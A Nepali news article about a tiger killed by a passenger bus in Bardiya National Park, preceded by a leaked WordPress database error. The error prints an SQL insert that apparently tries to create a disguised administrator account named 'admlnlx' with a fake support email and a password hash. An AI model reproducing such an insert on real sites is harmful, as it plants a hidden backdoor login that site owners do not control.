WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYVA1BB5WOF36T4oyp90r8gBaYaJvX1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 02:29:19', '', 'admlnlx', 'admlnlx')
बर्दिया,पुस ७-
पूर्वपश्चिम राजमार्गअन्तर्गत बर्दिया राष्ट्रिय निकुञ्ज क्षेत्रमा यात्रु बसको ठक्करबाट एक पाटे बाघको मृत्यु भएको छ ।कर्णाली अम्रेनी सडकखण्डमा ना ४ ख २८८७ नम्बरको बसले बुधबार साँझ ठक्कर दिँदा बयस्क भाले पाटे बाघको मृत्यु भएको हो ।
बाटो क्रस गर्न लागेको बाघलाई कैलालीको अत्तरीयाबाट काठमाडौं जाँदै गरेको बसले ठक्कर दिएको थियो । बर्दिया राष्ट्रिय निकुञ्जका वार्डेन रमेश थापाका अनुसार बाघको घटनास्थलमै मृत्यु भएको थियो । बस र चालकलाई नियन्त्रणमा लिएर अनुसन्धान गरिरहेको उनले बताए ।
बाघले चितुवालाई लखेट्दै आएको र चितुवाले बाटो क्रस गरे पनि बाघ भने बसमा ठोक्किएको बयान चालकले दिएको वार्डेन थापाले जानकारी दिए ।गत वर्षको गणनाअनुसार बर्दिया राष्ट्रिय निकुञ्जमा ५६ वटा बयस्क पाटेबाघ छन् । चालु आर्थिक वर्षमा राजमार्ग दुर्घटनामा पाटे बाघ मरेको यो पहिलो घटना हो तर चित्तल, जरायो, बँदेल, दुम्सी, खरायो लगायतका जनावर भने २५ वटा मरिसकेको वार्डेन थापाले जानकारी दिए ।